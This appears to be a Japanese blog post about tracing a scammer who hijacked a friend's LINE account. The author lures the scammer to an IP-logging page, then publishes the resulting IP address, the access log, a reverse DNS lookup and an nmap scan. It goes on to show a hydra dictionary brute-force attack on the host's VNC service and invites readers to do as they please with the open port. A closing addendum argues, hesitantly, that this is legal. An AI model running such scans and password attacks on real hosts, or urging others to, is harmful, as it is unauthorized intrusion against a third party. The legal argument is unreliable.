概要
知り合いのLINEアカウントがクラックされて、Webmoneyを要求してきたので、犯人のIPアドレスを割り出して見ました。
とりあえずは、Webmoneyを買いたい人を装って、ノリノリでリプライしていきます。
相手は、中国人らしく、天安門事件と返信すると退席するという事例があるらしいので、IPアドレスを割り出したら、天安門事件とリプライしようと思ってました。
会話
LINE電話したら、相手が操作を間違って取ることを願って、かけてみましたが、応答ありませんでした。(´・ω・`)
Webmoneyを買ったふりをして、写メをWebにアップロードしたと報告します。もちろん、それは嘘でIPアドレスを抜くためのWebページです。しかし、なかなか開いてくれません。
やっと開きました!しかし、開いてくれた途端、退出されました。
LINEの運営がアカウントを無効化したためです。ぎりぎり間に合って良かった!
最後の〆のために作った、天安門のページがお蔵入りになってしまって残念です。
IPを調べる
こちらが、犯人がアクセスしたアクセスログ。
IPアドレスは126.7.173.196
Windows7で、Chromeを使っている模様。
(HTTPヘッダも取っておけば良かったなぁと反省)
126.7.173.196 - - [02/Jul/2014:22:43:48 +0900] "GET /static/webmoney.html HTTP/1.1" 200 272 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1"
プロバイダはYahoo BBの様子。
% host 126.7.173.196 196.173.7.126.in-addr.arpa domain name pointer softbank126007173196.bbtec.net.
軽くポートスキャンしてみると、VNCのポートが空いてる!
% nmap 126.7.173.196 Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-02 22:50 JST Nmap scan report for softbank126007173196.bbtec.net (126.7.173.196) Host is up (0.065s latency). Not shown: 995 closed ports PORT STATE SERVICE 135/tcp open msrpc 1025/tcp open NFS-or-IIS 1723/tcp open pptp 5800/tcp open vnc-http 5900/tcp open vnc Nmap done: 1 IP address (1 host up) scanned in 5.36 seconds
そして、VNCのパスワードをクラックするためにncrackをしばらく動かしていたんだけど、どうやらVNCの時はちゃんと動いてくれない模様。
次に、hydra使って、有名どころのパスワードを一通り試してみましたが、一致せず。。。。
% hydra -t 1 -P john.txt 126.7.173.196 vnc Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2014-07-05 16:20:39 [DATA] 1 task, 1 server, 3107 login tries (l:1/p:3107), ~3107 tries per task [DATA] attacking service vnc on port 5900 [ERROR] VNC server connection failed [ERROR] VNC server connection failed [ERROR] VNC server connection failed [ERROR] VNC server connection failed .... [ERROR] VNC server connection failed [ERROR] VNC server connection failed [ERROR] Not a VNC protocol or service shutdown: (null) [ERROR] Too many connect errors to target, disabling vnc://126.7.173.196:5900 0 of 1 target completed, 0 valid passwords found [ERROR] 1 target did not resolve or could not be connected Hydra (http://www.thc.org/thc-hydra) finished at 2014-07-05 16:38:16
BruteForceかけるのもだるいので、これにておわり。
まだVNCのポートは空いているので、煮るなり焼くなりお好きにどうぞ。
追記7/7
不正アクセス禁止法に該当するのでは?という話がありますが、該当しないと考えています。
なぜなら、パスワードが判明し、それを使った瞬間に不正アクセス禁止法に抵触します。
以下の不正アクセスの定義に当てはまっていません。
4 この法律において「不正アクセス行為」とは、次の各号のいずれかに該当する行為をいう。 一 アクセス制御機能を有する特定電子計算機に電気通信回線を通じて当該アクセス制御機能に係る他人の識別符号を入力して当該特定電子計算機を作動させ、当該アクセス制御機能により制限されている特定利用をし得る状態にさせる行為(当該アクセス制御機能を付加したアクセス管理者がするもの及び当該アクセス管理者又は当該識別符号に係る利用権者の承諾を得てするものを除く。) 二 アクセス制御機能を有する特定電子計算機に電気通信回線を通じて当該アクセス制御機能による特定利用の制限を免れることができる情報(識別符号であるものを除く。)又は指令を入力して当該特定電子計算機を作動させ、その制限されている特定利用をし得る状態にさせる行為(当該アクセス制御機能を付加したアクセス管理者がするもの及び当該アクセス管理者の承諾を得てするものを除く。次号において同じ。) 三 電気通信回線を介して接続された他の特定電子計算機が有するアクセス制御機能によりその特定利用を制限されている特定電子計算機に電気通信回線を通じてその制限を免れることができる情報又は指令を入力して当該特定電子計算機を作動させ、その制限されている特定利用をし得る状態にさせる行為
あと、パスワード取得目的に関して言えば、インシデントリポートに使うためです。
第四条 何人も、不正アクセス行為(第二条第四項第一号に該当するものに限る。第六条及び第十二条第二号において同じ。)の用に供する目的で、アクセス制御機能に係る他人の識別符号を取得してはならない。
(たぶん)